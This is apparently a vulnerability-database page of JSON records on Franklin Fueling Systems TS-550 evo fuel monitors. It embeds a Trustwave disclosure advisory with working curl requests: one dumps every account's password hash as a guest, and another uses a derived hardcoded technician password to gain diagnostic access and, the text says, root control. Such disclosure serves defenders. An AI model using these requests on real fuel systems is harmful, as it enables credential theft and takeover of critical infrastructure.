"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TS-550 evo \u0026 TS-5000 evo",
"trust": 0.8,
"url": "http://www.franklinfueling.com/americas/fms/featured/1697/en/ts-550-evo-ts-5000-evo#Highlights"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114768"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.u235.io/single-post/2017/05/01/penetrating-fuel-management-systems"
},
{
"trust": 1.7,
"url": "https://gist.github.com/stick-u235/b187931f828e92866d09b9bdeb956ca2"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6565"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-6565"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114768"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-388"
},
{
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-114768"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-388"
},
{
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-01T00:00:00",
"db": "VULHUB",
"id": "VHN-114768"
},
{
"date": "2017-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"date": "2017-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-388"
},
{
"date": "2017-05-01T19:59:00.207000",
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-114768"
},
{
"date": "2017-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003717"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-388"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-6565"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-388"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling Systems TS-550 evo Device access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003717"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-388"
}
],
"trust": 0.6
}
}
VAR-201401-0295
Vulnerability from variot - Updated: 2025-04-11 22:53cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version 2.4.0
Product description: A fuel management system with a programmable interface used for inventory and delivery management.
Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200
As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application.
Request
curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi
Response
Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798
The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby:
$ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC."
Request
curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi
Response (note the ROLE)
The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix.
Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published
References 1. http://www.franklinfueling.com/evo/
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0295",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.9,
"vendor": "franklinfueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.6,
"vendor": "franklinfueling",
"version": "2.3.1.7492"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.0,
"vendor": "franklinfueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": null,
"trust": 0.8,
"vendor": "franklin fueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "lt",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.4.0"
},
{
"model": "ts-550 evo",
"scope": "ne",
"trust": 0.3,
"vendor": "franklinfueling",
"version": "2.4.0"
}
],
"sources": [
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:franklinfueling:ts-550_evo",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nate Drier and Matt Jakubowski of TrustWave SpiderLabs",
"sources": [
{
"db": "BID",
"id": "64996"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.9
},
"cve": "CVE-2013-7247",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2013-7247",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-67249",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7247",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-7247",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-415",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-67249",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. \nSuccessfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. \nFranklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version\n2.4.0\n\nProduct description:\nA fuel management system with a programmable interface used for inventory\nand delivery management. \n\nFinding 1: Insufficient Access Control\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7247\nCWE: CWE-200\n\nAs the Guest user (the lowest privilege), a user can post the\ncmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the\nusernames and password hashes (in DES format) for all users of the\napplication. Once dumped, they can be cracked and used to access\nauthenticated portions of the application. \n\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebGetConfiguration\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-02-19T22:09:22Z\" TIME_STAMP_LOCAL=\"2013-02-19T17:09:22\" KEY=\"11111111\" ROLE=\"roleGuest\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebGetConfiguration\"\u003e\u003cCONFIGURATION\u003e\n \u003cDEBUGGING LOGGING_ENABLED=\"false\" LOGGING_PATH=\"/tmp\"/\u003e\n \u003cROLE_LIST\u003e\n \u003cROLE NAME=\"roleAdmin\" PASSWORD=\"YrKMc2T2BuGvQ\"/\u003e\n \u003cROLE NAME=\"roleUser\" PASSWORD=\"2wd2DlEKUPTr2\"/\u003e\n \u003cROLE NAME=\"roleGuest\" PASSWORD=\"YXFCsq2GXFQV2\"/\u003e\n \u003c/ROLE_LIST\u003e\n\u003c/CONFIGURATION\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nFinding 2: Hardcoded Technician Credentials\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7248\nCWE: CWE-798\n\nThe three primary users on the TS550 are roleGuest, roleUser, and\nroleAdmin. Another user exists with additional access named roleDiag. This\nuser can access extra portions of the application such as the command line\ninterface, enable and disable SSH, as well as run SQL commands all from the\nweb interface. The CLI interface includes the ability to run engineering\nand manufacturing commands. The password for roleDiag is the key (a value\nreturned with every POST request to tsaws.cgi) DES encrypted. This can be\ndone in Ruby:\n\n\n$ irb\n1.9.3p374 :001 \u003e \"11111111\".crypt(\"aa\")\n =\u003e \"aaDTlAa1fGGC.\"\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST PASSWORD=\"aaDTlAa1fGGC.\"\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebCheckRole\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response (note the ROLE)\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-03-04T16:53:01Z\" TIME_STAMP_LOCAL=\"2013-03-04T11:53:01\" KEY=\"11111111\" ROLE=\"roleDiag\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebCheckRole\"\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nThe password can then be used to run various roleDiag commands. An attacker\ncan enable SSH, and since root\u0027s password is the same as roleAdmin, they\ncan completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. \n\n\nRevision History:\n04/16/13 - Vulnerability disclosed to vendor\n12/18/13 - Fix released on a limited basis by vendor\n01/03/14 - Advisory published\n\nReferences\n1. http://www.franklinfueling.com/evo/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "PACKETSTORM",
"id": "124873"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-67249",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7247",
"trust": 2.9
},
{
"db": "BID",
"id": "64996",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "56185",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-84525",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "31180",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-67249",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "124873",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"id": "VAR-201401-0295",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T22:53:07.945000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TS-550 evo",
"trust": 0.8,
"url": "http://www.franklinfueling.com/americas/en/ts-550-evo"
},
{
"title": "ts550evo-2327608",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=47720"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2014-001.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7247"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7247"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/56185"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/64996"
},
{
"trust": 0.3,
"url": "http://www.franklinfueling.com/americas/en"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7247"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/evo/"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/)"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7248"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-67249"
},
{
"date": "2014-01-03T00:00:00",
"db": "BID",
"id": "64996"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"date": "2014-01-21T23:03:33",
"db": "PACKETSTORM",
"id": "124873"
},
{
"date": "2014-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-415"
},
{
"date": "2014-01-26T01:55:09.877000",
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-67249"
},
{
"date": "2015-03-19T08:08:00",
"db": "BID",
"id": "64996"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"date": "2014-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-415"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling Systems TS-550 evo Of firmware cgi-bin/tsaws.cgi Vulnerability in which important information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.6
}
}
VAR-201401-0296
Vulnerability from variot - Updated: 2025-04-11 22:53Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device. Affects prior to version 2.4.0
Product description: A fuel management system with a programmable interface used for inventory and delivery management.
Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200
As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application.
Request
curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi
Response
Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798
